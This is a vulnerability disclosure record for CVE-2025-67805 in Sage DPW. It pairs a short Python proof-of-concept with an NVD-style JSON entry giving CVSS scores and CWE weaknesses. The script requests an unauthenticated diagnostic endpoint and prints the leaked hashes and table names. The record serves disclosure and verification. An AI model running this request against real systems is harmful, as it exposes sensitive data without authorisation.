CVE-2025-67805

import requests # PoC for CVE-2025-67805: Unauthenticated Access to Diagnostic Endpoints # Target: Sage DPW 2025_06_004 with non-default Database Monitor configuration target_url = "http://target-ip:port/diagnostics/db_monitor" try: # Send unauthenticated GET request to the diagnostic endpoint response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed: Diagnostic endpoint is accessible without authentication.") print("[+] Sensitive Information Exposed:") print(response.text[:500]) # Display snippet of leaked data (hashes/tables) else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")

{"cve": {"id": "CVE-2025-67805", "sourceIdentifier": "[email protected]", "published": "2026-04-01T16:23:48.177", "lastModified": "2026-05-10T14:16:45.980", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A non-default configuration in Sage DPW 2025_06_004 allows unauthenticated access to diagnostic endpoints within the Database Monitor feature, exposing sensitive information such as hashes and table names. This feature is disabled by default in all installations and never available in Sage DPW Cloud. It was forcibly disabled again in version 2025_06_003."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sagedpw:sage_dpw:2025_06_004:*:*:*:*:*:*:*", "matchCriteriaId": "633B447B-E044-4548-9D21-E82129683125"}]}]}], "references": [{"url": "https://pastebin.com/Tk4LgMG2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sagedpw.at/", "source": "[email protected]", "tags": ["Product"]}]}}